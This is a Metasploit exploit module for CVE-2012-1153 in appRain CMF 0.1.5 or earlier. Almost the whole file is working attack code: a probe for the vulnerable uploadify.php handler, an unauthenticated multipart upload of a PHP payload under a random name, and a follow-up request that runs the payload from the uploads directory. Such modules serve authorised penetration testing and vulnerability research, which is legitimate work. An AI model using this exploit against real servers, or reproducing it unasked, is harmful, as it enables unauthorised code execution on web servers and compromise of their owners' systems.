##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
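class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Path, relative to TARGETURI, of the upload handler that both #check and
  # #exploit talk to.
  UPLOADIFY_PATH = 'addons/uploadify/uploadify.php'
  # Path, relative to TARGETURI, of the directory the uploaded file is
  # requested from afterwards.
  UPLOADS_PATH = 'addons/uploadify/uploads'
  # Multipart boundary; must match between the body and the Content-Type header.
  BOUNDARY = 'o0oOo0o'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "appRain CMF Arbitrary PHP File Upload Vulnerability",
        'Description' => %q{
          This module exploits a vulnerability found in appRain's Content Management
          Framework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a
          malicious user can upload a file to the uploads/ directory without any
          authentication, which results in arbitrary code execution.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'EgiX', # Discovery, PoC
          'sinn3r' # Metasploit
        ],
        'References' => [
          ['CVE', '2012-1153'],
          ['OSVDB', '78473'],
          ['EDB', '18392'],
          ['BID', '51576']
        ],
        'Payload' => {
          'BadChars' => "\x00"
        },
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Targets' => [
          ['appRain 0.1.5 or less', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-01-19',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # NOTE(review): the default base path looks like the directory name of the
    # 0.1.5 release archive; confirm against the actual install before relying on it.
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5'])
      ]
    )
  end

  # Non-destructive probe: a single GET (no body) to the upload handler under
  # TARGETURI. An HTTP 200 with an empty body is treated as evidence that the
  # handler is present; no response, any other status, or a non-empty body is
  # reported as Safe. Leading/trailing slashes are left to normalize_uri, so the
  # string returned by target_uri.path is no longer mutated in place.
  #
  # @return [Msf::Exploit::CheckCode] Appears or Safe
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, UPLOADIFY_PATH)
    )

    return Exploit::CheckCode::Appears if res && res.code == 200 && res.body.to_s.empty?

    Exploit::CheckCode::Safe
  end

  # Uploads the PHP payload through the upload handler, then requests it.
  #
  # The POST body is one multipart/form-data part named "Filedata" whose
  # filename is a random alphabetic name (5..14 chars) with a .php extension
  # and whose content is the encoded payload wrapped in PHP tags. The upload
  # is only considered successful when the server answers 200 and the body
  # contains the generated filename; the file is then fetched from the uploads
  # directory. A non-200 on that second request is printed for debugging.
  #
  # @return [void]
  def exploit
    base = target_uri.path
    payload_name = "#{Rex::Text.rand_text_alpha(rand(5..14))}.php"

    # Wire bytes are kept exactly as the module has always sent them, including
    # the closing boundary line; the body is built in one expression so no
    # literal is mutated.
    post_data =
      "--#{BOUNDARY}\r\n" \
      "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n" \
      "<?php #{payload.encoded} ?>\r\n" \
      "--#{BOUNDARY}\r\n"

    print_status("Sending PHP payload (#{payload_name})")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(base, UPLOADIFY_PATH),
      'ctype' => "multipart/form-data; boundary=#{BOUNDARY}",
      'data' => post_data
    )

    # Only a 200 whose body names the uploaded file counts as a successful
    # upload. A literal substring test replaces the regex built from the
    # filename, so the "." in ".php" is matched literally.
    unless res && res.code == 200 && res.body.to_s.include?(payload_name)
      print_error("File wasn't uploaded, aborting!")
      return
    end

    print_status("Executing PHP payload (#{payload_name})")
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(base, UPLOADS_PATH, payload_name)
    )

    # Anything other than 200 here suggests no shell either; surface the status
    # code for debugging.
    print_status("Server returned #{res.code}") if res && res.code != 200
  end
end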